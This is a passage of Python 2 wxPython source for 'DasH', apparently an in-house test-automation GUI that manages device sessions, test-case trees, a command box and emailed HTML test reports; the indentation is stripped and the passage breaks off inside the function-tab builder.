self.out.AppendText( string[last_start:])
else:
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
wx.CallAfter(self.out.AppendText, string)
if self.log_file:
self.log_file.write(string)
self.log_file.flush()
except:
pass
self.write_lock.release()
def close(self):
if self.log_file:
self.log_file.flush()
self.log_file.close()
def flush(self):
if self.log_file:
self.log_file.flush()
class process_info(object):
process = None
pid=None
full_name=None
returncode = None
def __init__(self,name, process):
self.process= process
self.pid = process.pid
self.full_name =name
self.returncode = process.returncode
@property
def returncode(self):
return self.process.returncode
class FileEditor(wx.Panel):
editor =None
font_size=10
parent=None
type = None
sessions_node =None
function_node =None
case_suite_node =None
full_file_name = None
file_instance = None
def on_close(self):
if self.full_file_name:
data = self.editor.GetValue()
with open(self.full_file_name, 'w') as f:
f.write(data)
f.flush()
#done 2017-9-12: handle close tab in edit_area
def __init__(self, parent, title='pageOne', type ='grid', file_name = None):
wx.Panel.__init__(self, parent)
self.parent = parent
self.type = type
self.full_file_name = file_name
#self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
if type in ['text']:
self.editor = wx.TextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
#wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
with open(self.full_file_name, 'r') as f:
for line in f.readlines():
self.editor.AppendText(line)
else:
self.editor= gridlib.Grid(self)
self.editor.CreateGrid(50, 5)
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
function_color ='black'
arg_color = 'blue'
for c in range(0, col):
if c < 1 :
self.editor.SetColLabelValue(c, 'Function Name')
else:
self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
for r in range (0, row):
self.editor.SetCellTextColour(r,c,function_color if c <1 else arg_color)
for r in range (0, row):
self.editor.SetCellFont(r, 0, wx.Font(self.font_size,wx.SWISS, wx.NORMAL, wx.BOLD ))
self.editor.Bind( wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel )
sizer = wx.BoxSizer()
sizer.Add(self.editor, 1, wx.EXPAND)
self.SetSizer(sizer)
def editor_OnMouseWheel(self,event):
min_font_size = 5
interval_step = 2
if event.ControlDown():
pass
else:
return
if event.GetWheelRotation() < 0:
if self.font_size>min_font_size:
self.font_size-=interval_step
else:
self.font_size+=1
if self.type in ['text']:
f =self.editor.GetFont()
f.PointSize= self.font_size
self.editor.SetFont(f)
else:
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
for c in range(0, col):
for r in range (0, row):
f = self.editor.GetCellFont(r, c)
f.PointSize = self.font_size
self.editor.SetCellFont(r, c, f)
self.Refresh()
#wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
from functools import wraps
import pprint
def gui_event_thread_handler( func):
@wraps(func)
def inner(func, *args, **kwargs):
ret =None
try:
ret = func(*args, **kwargs)
#th = threading.Thread(target=func,args= args, kwargs=kwargs)
#th.start()
except:
error(traceback.format_exc())
return ret
return inner
class gui_event_decorator():
def __init__(self):
pass
@classmethod
def gui_even_handle(self, func):
def inner(*args, **kwargs):
ret =None
try:
#print('decorator!!!')
#ret = func(*args, **kwargs)
th = threading.Thread(target=func,args= args, kwargs=kwargs)
th.start()
#print('decorator####')
except:
print(traceback.format_exc())
return ret
return inner
class DasHFrame(MainFrame, gui_event_decorator):#wx.Frame
ini_setting = None
#m_left_navigator =None
redir = None
edit_area=None
tabs_in_edit_area = None
src_path = './src/'
sessions_alive=None
sequence_queue=None
history_cmd = []
history_cmd_index = -1
import_modules={'TC':''}
lib_path ='./lib'
log_path = '../log/dash'
session_path = './sessions'
suite_path = '../test_suite'
dict_test_report= ''
alive =True
mail_server=None
mail_to_list=None
mail_from=None
mail_read_url= 'outlook.office365.com'
mail_password = None
mail_user ='nonexistent@dash.com'
case_queue =None
check_case_running_status_lock = None
case_list=None
#session_names={}
web_daemon = None
web_host = None
web_port = 8888
mailed_case_pids= []
timestamp=None
mail_failure =False
last_time_call_on_idle= None
ini_file=None
dict_function_obj= {'instance':{}}
dict_function_files = {}
def __init__(self,parent=None, ini_file = './gDasH.ini'):
#wx.Frame.__init__(self, None, title="DasH")
gui_event_decorator.__init__(self)
self.timestamp= datetime.now().isoformat('-').replace(':','-')
self.case_list= []
self.case_queue = Queue.Queue()
self.dict_test_report={}
self.check_case_running_status_lock = threading.Lock()
self.tabs_in_edit_area=[]
self.sessions_alive={}
MainFrame.__init__(self, parent=parent)
self.sequence_queue= Queue.Queue()
#self.sequence_queue.put()
self.ini_setting = ConfigParser.ConfigParser()
if os.path.exists(ini_file):
self.ini_setting.read(ini_file)
self.src_path = os.path.abspath(self.ini_setting.get('dash','src_path'))
self.lib_path = os.path.abspath(self.ini_setting.get('dash','lib_path'))
self.log_path = os.path.abspath(self.ini_setting.get('dash','log_path'))
self.suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
self.mail_server = self.ini_setting.get('dash', 'mail_server')
self.mail_from =self.ini_setting.get('dash', 'mail_from')
self.mail_to_list =self.ini_setting.get('dash', 'mail_to_list')
self.mail_read_url =self.ini_setting.get('dash', 'mail_read_url')
self.mail_user = self.ini_setting.get('dash','mail_user')
self.mail_password =self.ini_setting.get('dash', 'mail_password')
self.web_port =int(self.ini_setting.get('dash', 'web_port'))
else:
with open(ini_file, 'w') as tmp_ini_file:
tmp_ini_file.write('''[dash]
test_suite_path = ../test_suite/
log_path= {log_path}
lib_path = {lib_path}
session_path={session_path}
#the source python file folder
src_path = {src_path}
mail_server={mail_server}
mail_to_list={mail_to_list}
mail_user={mail_user}
mail_from ={mail_from}
mail_read_url={mail_read_url}
mail_password = {mail_password}
web_port={web_port}
'''.format(
log_path = self.log_path,
lib_path = self.lib_path,
session_path = self.session_path,
src_path = self.src_path,
mail_server = self.mail_server,
mail_to_list = self.mail_to_list,
mail_user = self.mail_user,
mail_from = self.mail_from,
mail_read_url = self.mail_read_url,
mail_password = self.mail_password,
web_port = self.web_port))
tmp_ini_file.flush()
#self.ini_setting.read(ini_file)
self.ini_file = ini_file
from lib.common import create_case_folder, create_dir
sys.argv.append('-l')
sys.argv.append('{}'.format(self.log_path))
from lib.common import create_dir
self.log_path = create_dir(self.log_path)
self.suite_path = create_dir(self.suite_path)
self.lib_path = create_dir(self.lib_path)
self.src_path = create_dir(self.src_path)
if not os.path.exists(self.log_path):
os.mkdir(self.log_path)
self.add_src_path_to_python_path(self.src_path)
self.redir = RedirectText(self.m_log, self.log_path)
sys.stdout = self.redir
sys.stderr = self.redir
self.m_log.SetBackgroundColour('Black')
self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font =wx.Font(9, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))
#self.m_editor.WriteText('welcome to dash world')
self.m_log.WriteText('Welcome to DasH!\n')
self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
fileMenu = wx.Menu()
#open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
#open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
generate_test_report = fileMenu.Append(wx.NewId(), "Generate Test Report", "Generate Test Report")
generate_code = fileMenu.Append(wx.NewId(), "Generate Python Code", "Generate Python Code")
mail_test_report = fileMenu.Append(wx.NewId(), "Mail Test Report", "Mail Test Report")
get_case_queue = fileMenu.Append(wx.NewId(), "Get Case Queue", "Get Case Queue") #done
clear_case_queue = fileMenu.Append(wx.NewId(), "Clear Case Queue", "Clear Case Queue")
kill_running_case = fileMenu.Append(wx.NewId(), "Kill Running Case(s)", "Kill Running Case(s)")
self.m_menubar_main.Append(fileMenu, "&Operations")
self.Bind(wx.EVT_MENU,self.on_generate_test_report ,generate_test_report)
self.Bind(wx.EVT_MENU,self.on_generate_code ,generate_code)
self.Bind(wx.EVT_MENU,self.on_mail_test_report ,mail_test_report)
self.Bind(wx.EVT_MENU,self.get_case_queue ,get_case_queue)
self.Bind(wx.EVT_MENU,self.on_clear_case_queue ,clear_case_queue)
self.Bind(wx.EVT_MENU,self.on_kill_running_case ,kill_running_case)
self.Bind(wx.EVT_CLOSE, self.on_close)
self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
from wx.aui import AuiNotebook
bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE &(~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
self.navigator = AuiNotebook(self.m_left_navigator, style= bookStyle )
self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.navigator.AddPage(self.session_page, 'SESSION')
self.navigator.AddPage(self.function_page, 'FUNCTION')
self.navigator.AddPage(self.case_suite_page, 'CASE')
self.edit_area = AuiNotebook(self.m_file_editor, style = wx.aui.AUI_NB_DEFAULT_STYLE)
if False:
new_page = FileEditor(self.edit_area, 'a', type= type)
self.edit_area.AddPage(new_page, 'test')
self.tabs_in_edit_area.append(('test'))
self.edit_area.Enable(True)
right_sizer = wx.BoxSizer(wx.VERTICAL)
#right_sizer =wx.GridSizer( 3, 1, 0, 0 )
left_sizer = wx.BoxSizer(wx.HORIZONTAL)
left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
#self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
self.session_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_session_tab)
self.edit_area.Bind(wx.aui.EVT__AUINOTEBOOK_TAB_RIGHT_DOWN, self.on_right_up_over_tab_in_edit_area)
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer = wx.GridSizer( 1, 2, 0, 0 )
nav_sizer = wx.BoxSizer()
nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
self.m_left_navigator.SetSizer(nav_sizer)
#main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer.Add(left_sizer, 3, wx.EXPAND)
main_sizer.Add(left_sizer, 2, wx.EXPAND)
edit_sizer = wx.BoxSizer()
edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
self.m_file_editor.SetSizer(edit_sizer)
right_sizer.Add(self.m_file_editor, 8, wx.ALL|wx.EXPAND, 1)
right_sizer.Add(self.m_log, 2, wx.ALL|wx.EXPAND, 2)
right_sizer.Add(self.m_command_box, 0, wx.ALL|wx.EXPAND, 3)
main_sizer.Add(right_sizer, 8, wx.EXPAND)
self.SetSizer(main_sizer)
ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
#th= threading.Thread(target=self.polling_running_cases)
#th.start()
#th = threading.Thread(target=self.polling_request_via_mail)
#th.start()
threading.Thread(target=self.web_server_start).start()
#tooltips bind
self.case_suite_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.session_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.function_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#wx.html.EVT_HTML_LINK_CLICKED wx.EVT_TEXT_URL, wx.EVT_TEXT_URL,
self.m_log.Bind(wx.EVT_TEXT_URL, self.on_leftD_click_url_in_m_log)
self.Bind(wx.EVT_IDLE, self.on_idle)
self.last_time_call_on_idle = datetime.now()
self.build_session_tab()
self.build_suite_tree()
self.build_function_tab()
self.Show(True)
self.Maximize()
def on_close(self, event):
try:
self.alive =False
sys.stderr =self.redir.old_stderr
sys.stdout = self.redir.old_stdout
self.redir.close()
event.Skip()
except Exception as e:
error(traceback.format_exc())
self.Show(False)
time.sleep(0.01)
def close():
try:
self.web_daemon.shutdown()
except:
pass
self.generate_code(file_name='{}/test_script.py'.format(self.suite_path))
if len(self.dict_test_report):
self.mail_test_report("DASH TEST REPORT")
for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
closing_page = self.edit_area.GetPage(index)
if isinstance(closing_page, (SessionTab)):
if closing_page:
name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
try:
closing_page.on_close()
except:
pass
close()
time.sleep(0.01)
#sys.exit(0)
def generate_report(self, filename, report_all_cases=True):
#fixed 2017-11-19, 2017-10-21 no need to send whole report, just the updating part
def GetTime(duration):
from datetime import timedelta
sec = timedelta(seconds=int(duration))
d = datetime(1,1,1) + sec
#print("DAYS:HOURS:MIN:SEC")
return "%d:%d:%d:%d" % (d.day-1, d.hour, d.minute, d.second)
report_in_list =[['result',
'start_time',
'end_time',
'ProcessID',
'duration',
'duration',
'case_name','log']]
report = '''Test Report
RESULT,\tStart_Time,\tEnd_Time,\tPID,\tDuration(s),\tDuration(D:H:M:S)\tCase_Name,\tLog\n'''
with open(filename, 'w') as f:
if len(self.dict_test_report):
#f.write(report)
for pi in sorted(self.dict_test_report, key = lambda x: self.dict_test_report[x][1]):
case_name, start_time, end_time, duration, return_code ,proc, log_path =self.dict_test_report[pi][:7]
if return_code is None:
result = 'IP'
result_html = '<font color="blue">IP'
else:
result = return_code # 'FAIL' if return_code else 'PASS'
if result.lower() in ['pass']:
result_html= '<font color="green">PASS'
else:
result_html= '<font color="red">FAIL'
one_record = ['{}'.format(x) for x in [
result,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'{html_link} {file_path}'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
one_record_html = ['{}'.format(x) for x in [
result_html,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'<a href={html_link}>{file_path}</a>'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
report_in_list.append(one_record_html)
record = '\t'.join(one_record)
if result == 'IP':
report+=record+'\n'
else:
if report_all_cases:
report+=record+'\n'
self.mailed_case_pids.append(pi)
elif pi not in self.mailed_case_pids:
report+=record+'\n'
self.mailed_case_pids.append(pi)
else:
pass
from lib.common import array2htmltable
report_in_html_string = array2htmltable(report_in_list)
f.write(report_in_html_string)
return report
def on_close_tab_in_edit_area(self, event):
#self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
def close_tab():
global gSessions
closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
closing_page.on_close()
if isinstance(closing_page, (SessionTab)):
ses_name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
if gSessions.has_key( ses_name):
# globals().has_key(ses_name):
#g = dict(globals())
#globals()[ses_name]=None
#del g[ses_name]
gSessions[ses_name].close_session()
del gSessions[ses_name] #del globals()[ses_name]
threading.Thread(target=close_tab, args=[]).start()
event.Skip()
def add_item_to_subfolder_in_tree(self,node):
subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
items = get_folder_item(subfolder_path_name)
if items is None:
self.case_suite_page.SetItemText(node, self.m_case_tree.GetItemText(node) + ' Not Exists!!!')
self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
return
for i in items:
path_name = '{}/{}'.format(subfolder_path_name,i)
base_name = os.path.basename(i)
item_info = wx.TreeItemData({'path_name':path_name})
self.case_list.append(path_name)
new_item = self.case_suite_page.InsertItem(node, node, base_name)
self.case_suite_page.SetItemData(new_item, item_info)
if os.path.isdir(path_name):
self.case_suite_page.SetItemHasChildren(new_item)
#self.m_case_tree.ItemHasChildren()
#self.m_case_tree.InsertItem(new_item,new_item,'')
@gui_event_decorator.gui_even_handle
def build_suite_tree(self):
suite_path = self.suite_path #os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
if not os.path.exists(suite_path):
suite_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(suite_path)
root =self.case_suite_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':suite_path})
self.case_suite_page.SetItemData(root, item_info)
self.add_item_to_subfolder_in_tree(root)
self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
ht_item =self.case_suite_page.GetSelection()
#ht_item = self.HitTest(event.GetPosition())
item_name = self.case_suite_page.GetItemText(ht_item)
item_data = self.case_suite_page.GetItemData(ht_item)
if self.case_suite_page.ItemHasChildren(ht_item):
if self.case_suite_page.IsExpanded(ht_item):
self.case_suite_page.Collapse(ht_item)
else:
self.case_suite_page.ExpandAllChildren(ht_item)
else:
if item_name.lower() in ['.csv', '.xlsx','.xls']:
type = 'grid'
file_name = item_data.Data['path_name']
else:
type = 'text'
file_name = item_data.Data['path_name']
new_page = FileEditor(self.edit_area, 'a', type= type,file_name=file_name)
self.edit_area.AddPage(new_page, item_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self,event):
ht_item =self.case_suite_page.GetSelection()
try:
item_info = self.case_suite_page.GetPyData(ht_item)
if 0== self.case_suite_page.GetChildrenCount(ht_item):
if os.path.isdir(item_info['path_name']):
self.add_item_to_subfolder_in_tree(ht_item)
except Exception as e:
pass
@gui_event_decorator.gui_even_handle
def build_session_tab(self):
if self.session_page.RootItem:
self.session_pagef.DeleteAllItems()
self.ini_setting.read(self.ini_file)
session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
self.session_path= session_path
if not os.path.exists(session_path):
session_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(session_path)
sessions = {}
root =self.session_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':session_path})
self.session_page.SetItemData(root, item_info)
self.session_page.Expand(root)
item_list = get_folder_item(session_path)
session_files=[]
for item in item_list:
if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
session_files.append(item)
for csv_file in sorted(session_files):
try:
ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
for bench in ses_in_bench:
for ses in ses_in_bench[bench]:
if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
ses_in_bench[bench][ses].update(
{'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
)
sessions.update(ses_in_bench)
except Exception as e:
error(traceback.format_exc())
root =self.session_page.GetRootItem()
for file_name in sorted(sessions.keys()):
item_name = os.path.basename(file_name)
item_info = wx.TreeItemData({'file_name':file_name})
new_bench = self.session_page.InsertItem(root, root, item_name)
self.case_suite_page.SetItemData(new_bench, item_info)
for ses in sorted(sessions[file_name]):
item_name = ses
item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
self.case_suite_page.SetItemData(new_item, item_info)
self.session_page.Expand(root)
first_child = self.session_page.GetFirstChild(root)
self.session_page.Expand(first_child[0])
#@gui_event_decorator.gui_even_handle
def on_LeftDClick_in_Session_tab(self, event):
ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
self.session_page.GetItemText(self.session_page.GetSelection())
session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
if session_attribute.Data.has_key('attribute'):
info(session_attribute.Data['attribute'])
counter =1
original_ses_name = ses_name
tmp_tabs =[]
for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
tab_page = self.edit_area.GetPage(index)
#tab_page.name
tmp_tabs.append(tab_page.name)
self.tabs_in_edit_area = tmp_tabs
while ses_name in self.tabs_in_edit_area:
ses_name= '{}_{}'.format(original_ses_name,counter)
counter+=1
if globals().has_key(ses_name):
if not globals().has_key('_{}'.format(ses_name)):
info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
ses_name='_{}'.format(ses_name)
self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
else:
error(("variable '{}' is existed in global, please change the name".format(ses_name)))
return
new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path+'/session_log')
window_id = self.edit_area.AddPage(new_page, ses_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
self.tabs_in_edit_area.append(ses_name)
self.sessions_alive.update({ses_name: new_page.name})
attribute = session_attribute.Data['attribute']
log_path='a_fake_log_path_for_auto_script'
attribute['log_path']=log_path
self.add_new_session_to_globals(new_page, '{}'.format(attribute))
#globals().update({ses_name: new_page.session})
time.sleep(0.1)
event.Skip()
def add_new_session_to_globals(self, new_page, args_str):
name = new_page.name
global DUT
#FIX ISSUE
# INFO common.py:161 call_function_in_module:
# module_name: xdsl
# class_name: xdsl
# function_name: get_eut
# args:[wxPython wrapper for DELETED SessionTab object! (The C++ object no longer exists.)]
# kwargs: {}
# Exception in thread Thread-40:
# Traceback (most recent call last):
# File "C:\Python27\Lib\threading.py", line 801, in __bootstrap_inner
# self.run()
# File "C:\Python27\Lib\threading.py", line 754, in run
# self.__target(*self.__args, **self.__kwargs)
# File "C:\workspace\gDasH\src\xdsl.py", line 36, in get_eut
# ses.write(cmd)
# File "C:\Python27\lib\site-packages\wx-3.0-msw\wx\_core.py", line 16711, in __getattr__
# raise PyDeadObjectError(self.attrStr % self._name)
if name in DUT:
try:
DUT[name].name
del DUT[name]
except :
DUT[name]= new_page
else:
DUT[name]= new_page
self.add_cmd_to_sequence_queue('DUT["{}"] = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
#session = dut(name, **attributes)
@gui_event_decorator.gui_even_handle
def on_command_enter(self, event):
info('called on_command_enter')
cmd = self.m_command_box.GetValue()
self.m_command_box.Clear()
cmd = cmd.strip()
cmds = cmd.replace('\r\n', '\n').split('\n')
def handle_one_cmd(cmd):
if cmd.strip()=='':
return
cmd_string = cmd.strip()
lex = shlex.shlex(cmd_string)
lex.quotes = '"'
lex.whitespace_split = True
cmd_list=list(lex)
function_obj_name = cmd_list[0]
if self.dict_function_obj.has_key(function_obj_name):
call_function = self.dict_function_obj[function_obj_name]
else:
return
module,class_name, function,args = parse_command_line(cmd)
self.add_cmd_to_history(cmd, module, None, class_name)
#args[0]=self.sessions_alive['test_ssh'].session
if module !='' or class_name!='' or function!='':
after_sub_args=[]
for i in range(len(args)):
a = args[i]
if a in globals():
after_sub_args.append(a)
elif a in DUT:
after_sub_args.append('DUT["{}"]'.format(a))
else:
after_sub_args.append(a)
function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,after_sub_args, globals())
#call_function = None
# if class_name!="":
#
# call_function = getattr(instance_name, function_name)
# #(*new_argvs,**new_kwargs)
# else:
# call_function = instance_name#(*new_argvs,**new_kwargs)
th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
th.start()
#self.m_command_box.ShowPosition(len(self.m_command_box.GetString())+1)
self.add_cmd_to_history(cmd, module, str_code, class_name)
else:
error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
for cmd in cmds:
try:
handle_one_cmd(cmd)
except:
error(traceback.format_exc())
event.Skip()
def add_src_path_to_python_path(self, path):
paths = path.split(';')
old_path = sys.path
for p in paths:
if p in old_path:
info('path {} already in sys.path'.format(p))
else:
abspath = os.path.abspath(p)
if os.path.exists(abspath):
sys.path.insert(0,abspath)
else:
warn('path {} is not existed, ignored to add it into sys.path'.format(p))
def on_key_down(self, event):
#error(event.KeyCode)
keycode = event.KeyCode
if keycode ==wx.WXK_TAB:
self.m_command_box.AppendText('\t')
self.on_command_enter(event)
elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
self.m_command_box.AppendText('?')
self.on_command_enter(event)
else:
event.Skip()
def on_key_up(self, event):
keycode = event.KeyCode
increase =False
if keycode ==wx.WXK_UP:
pass
elif keycode ==wx.WXK_DOWN:
increase =True#
if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
self.m_command_box.Clear()
self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=increase)
self.m_command_box.AppendText(new_command)
if keycode in [wx.WXK_TAB]:
pass
else:
event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code, class_name=""):
if str_code is None:
if self.history_cmd==[]:
self.history_cmd.append(cmd)
elif self.history_cmd[-1]==cmd:
pass
else:
self.history_cmd.append(cmd)
self.history_cmd_index= len(self.history_cmd)
else:# str_code is not None:
self.add_cmd_to_sequence_queue(str_code,module_name, class_name )
#self.sequence_queue.put([cmd, datetime.now()])
def get_description_of_function(self, function_obj):
import inspect
fundefstr=''
try:
try:
fundef = inspect.getsource(function_obj) # recreate function define for binary distribute
fundefstr = fundef[:fundef.find(':')]
except Exception as e:
(args, varargs, keywords, defaults) =inspect.getargspec(function_obj)
argstring = ''
largs=len(args)
ldefaults= len(defaults)
gaplen = largs-ldefaults
index =0
for arg in args:
if index <gaplen:
argstring+='%s, '%arg
else:
defvalue = defaults[index-gaplen]
if type('')==type(defvalue):
defvalue = '"%s"'%defvalue
argstring+='%s = %s, '%(arg,str(defvalue))
index+=1
fundefstr ='%s( %s )'%(function_obj.func_name, argstring)
fundef =fundefstr
listoffun =fundef.split('\n')
ret = function_obj.__doc__
if ret:
fundefstr = fundefstr +'\n '+'\n '.join(ret.split('\n'))
except Exception as e:
pass
return fundefstr
@gui_event_decorator.gui_even_handle
def check_whether_function_file_is_updated(self):
for module_file in self.dict_function_files.keys():
old_modify_time = self.dict_function_files[module_file]
current_modify_time = os.path.getmtime(module_file)
if current_modify_time ==old_modify_time:
continue
else:
self.build_function_tab()
@gui_event_decorator.gui_even_handle
def build_function_tab(self):
try:
instances = self.dict_function_obj['instance'].keys()
for inst_name in instances:
inst = self.dict_function_obj['instance'][inst_name]
#print ('instance ref count',inst_name, sys.getrefcount(inst))
if 'close' in dir(inst):
inst.close()
del inst
fun_list = self.dict_function_obj.keys()
for fun_name in fun_list:
inst = self.dict_function_obj[fun_name]
#print ('instance ref count',fun_name, sys.getrefcount(inst))
del inst
time.sleep(1)
#import gc
#gc.collect()
self.dict_function_obj={'instance':{}}
self.dict_function_files= {}
src_path = os.path.abspath(self.src_path)
if not os.path.exists(src_path):
src_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(src_path)
root =self.function_page.AddRoot(base_name)
item_info = wx.TreeItemData({'name':src_path})
self.function_page.SetItemData(root, item_info)
modules = get_folder_item(src_path)
if modules is None:
self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
return
for module_file in modules:
if module_file.endswith('.pyc'):
if module_file[:-1] in modules:
continue
if module_file.startswith('__'):
continue
path_name = '{}'.format(os.path.abspath(self.src_path))
module_name = os.path.basename(module_file).split('.')[0]
extension = os.path.basename(module_file).split('.')[-1]
full_name = '{}/{}'.format(path_name,module_file)
if extension.lower() in ['py', 'pyc']:
try:
new_module = self.function_page.InsertItem(root, root, module_name)
module_file, path_name, description = imp.find_module(module_name)
lmod = imp.load_module(module_name, module_file, path_name,description)
self.dict_function_files[full_name] = os.path.getmtime(full_name)
for attr in sorted(dir(lmod)):
if attr.startswith('__'):
continue
attr_obj = getattr(lmod, attr)
attr_type = type(attr_obj)
if attr_type == types.FunctionType :
